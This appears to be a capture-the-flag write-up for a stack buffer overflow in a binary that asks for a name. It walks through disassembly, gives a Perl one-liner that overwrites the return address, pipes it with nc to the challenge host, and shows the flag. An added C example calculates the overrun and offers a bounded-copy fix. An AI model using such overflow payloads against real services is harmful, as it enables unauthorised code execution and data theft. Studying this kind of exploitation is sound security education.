Sample program output:

```
What's your name?
Testing Name
It's dangerous to go alone! Take this, Testing Name
█
███
███
███
███
███
███
███
███
███
███████
█ ███ █
███
███
███
```
The program asks the user for a name, then displays a message and a sword. The message is built on the stack with a series of movabs/mov instructions:

```
  401210:  48 b8 49 74 27 73 20   movabs rax,0x6e61642073277449
  401217:  64 61 6e
  40121a:  48 ba 67 65 72 6f 75   movabs rdx,0x742073756f726567
  401221:  73 20 74
  401224:  48 89 85 f0 fd ff ff   mov    QWORD PTR [rbp-0x210],rax
  40122b:  48 89 95 f8 fd ff ff   mov    QWORD PTR [rbp-0x208],rdx
  401232:  48 b8 6f 20 67 6f 20   movabs rax,0x6f6c61206f67206f
  401239:  61 6c 6f
  40123c:  48 ba 6e 65 21 20 54   movabs rdx,0x656b61542021656e
  401243:  61 6b 65
  401246:  48 89 85 00 fe ff ff   mov    QWORD PTR [rbp-0x200],rax
  40124d:  48 89 95 08 fe ff ff   mov    QWORD PTR [rbp-0x1f8],rdx
  401254:  48 b8 20 74 68 69 73   movabs rax,0x202c7369687420
  40125b:  2c 20 00
  40125e:  ba 00 00 00 00         mov    edx,0x0
  401263:  48 89 85 10 fe ff ff   mov    QWORD PTR [rbp-0x1f0],rax
  40126a:  48 89 95 18 fe ff ff   mov    QWORD PTR [rbp-0x1e8],rdx
```
It then concatenates the user's name onto that message, reading the name with the read function:

```
  40129c:  48 8d 85 f0 fd ff ff   lea    rax,[rbp-0x210]
  4012a3:  48 89 c7               mov    rdi,rax
  4012a6:  e8 f5 fd ff ff         call   4010a0 <strlen@plt>
  4012ab:  48 8d 95 f0 fd ff ff   lea    rdx,[rbp-0x210]
  4012b2:  48 01 d0               add    rax,rdx
  4012b5:  ba 00 02 00 00         mov    edx,0x200
  4012ba:  48 89 c6               mov    rsi,rax
  4012bd:  bf 00 00 00 00         mov    edi,0x0
  4012c2:  e8 f9 fd ff ff         call   4010c0 <read@plt>
```
The problem is that read writes the name directly after the end of the existing string, i.e. at rbp - 0x210 + strlen("It's dangerous..."). Since read is allowed to read up to 0x200 bytes from that position, the write runs past the end of the buffer and can overwrite the return address.
There are no stack canaries and no ASLR, and right after the main function there is a function that opens a file named flag.txt and prints it out:

```
  40130d:  c3                     ret
  40130e:  f3 0f 1e fa            endbr64
  401312:  55                     push   rbp
  401313:  48 89 e5               mov    rbp,rsp
  401316:  48 81 ec 10 02 00 00   sub    rsp,0x210
  40131d:  be 00 00 00 00         mov    esi,0x0
  401322:  48 8d 3d 16 0f 00 00   lea    rdi,[rip+0xf16]        # 40223f <open@plt+0x115f>
  401329:  b8 00 00 00 00         mov    eax,0x0
  40132e:  e8 ad fd ff ff         call   4010e0 <open@plt>
  401333:  89 45 fc               mov    DWORD PTR [rbp-0x4],eax
  401336:  48 8d 8d f0 fd ff ff   lea    rcx,[rbp-0x210]
  40133d:  8b 45 fc               mov    eax,DWORD PTR [rbp-0x4]
  401340:  ba 00 02 00 00         mov    edx,0x200
  401345:  48 89 ce               mov    rsi,rcx
  401348:  89 c7                  mov    edi,eax
  40134a:  e8 71 fd ff ff         call   4010c0 <read@plt>
  40134f:  8b 45 fc               mov    eax,DWORD PTR [rbp-0x4]
  401352:  89 c7                  mov    edi,eax
  401354:  e8 57 fd ff ff         call   4010b0 <close@plt>
  401359:  48 8d 85 f0 fd ff ff   lea    rax,[rbp-0x210]
  401360:  48 89 c7               mov    rdi,rax
  401363:  e8 28 fd ff ff         call   401090 <puts@plt>
  401368:  90                     nop
  401369:  c9                     leave
  40136a:  c3                     ret
```
So simply overwriting the return address with 0x401313 (the mov rbp,rsp right after that function's push rbp) works.

Solution:

```
perl -e 'printf("a"x497 . "\x13\x13\x40" . "\x00"x10);' | nc jh2i.com 50011
```
flag{legend_of_zelda_overflow_of_time}
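The arithmetic behind this overflow, together with a bounded version of the name concatenation, as an added C example that is not part of the writeup or of the challenge binary. The buffer size, read length and prefix string are the values taken from the disassembly above; the 600-byte name is constructed input, and append_name_bounded is a hypothetical fix, not code from the challenge.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 0x210   /* buffer at [rbp-0x210]: 0x210 bytes up to the saved rbp */
#define READ_LEN 0x200   /* length the program passes to read() */
#define PREFIX "It's dangerous to go alone! Take this, "   /* 39 bytes, from the movabs */

/* Bytes the original read() may write past the end of the buffer: the name
 * lands at buf + strlen(PREFIX) and may itself be READ_LEN bytes long. */
size_t overrun_bytes(size_t buf_size, size_t prefix_len, size_t read_len) {
    size_t end = prefix_len + read_len;
    return end > buf_size ? end - buf_size : 0;
}

/* Distance from where the name lands to the saved return address (the 8-byte
 * saved rbp sits in between); this is the 497-byte padding in the payload. */
size_t name_to_retaddr(size_t buf_size, size_t prefix_len) {
    return buf_size + 8 - prefix_len;
}

/* Hypothetical fix: copy only into the room left after the existing string, keeping
 * one byte for the terminator. src/src_len stand in for what read() would deliver. */
size_t append_name_bounded(char *buf, size_t buf_size,
                           const char *src, size_t src_len) {
    const char *nul = memchr(buf, '\0', buf_size);
    size_t used = nul ? (size_t)(nul - buf) : buf_size;
    if (used + 1 >= buf_size) return 0;          /* no room left at all */
    size_t room = buf_size - 1 - used;
    size_t n = src_len < room ? src_len : room;
    memcpy(buf + used, src, n);
    buf[used + n] = '\0';
    return n;                                    /* bytes actually kept */
}

/* Constructed input: a 600-byte name, longer than the whole buffer.
 * Returns the final string length, which stays below BUF_SIZE. */
size_t demo_overlong_name(void) {
    char buf[BUF_SIZE], name[600];
    memset(name, 'a', sizeof name);
    strcpy(buf, PREFIX);
    append_name_bounded(buf, sizeof buf, name, sizeof name);
    return strlen(buf);
}

int main(void) {
    printf("overrun %zu, name->ret %zu, bounded copy %zu\n",
           overrun_bytes(BUF_SIZE, strlen(PREFIX), READ_LEN),
           name_to_retaddr(BUF_SIZE, strlen(PREFIX)), demo_overlong_name());
    return 0;
}
```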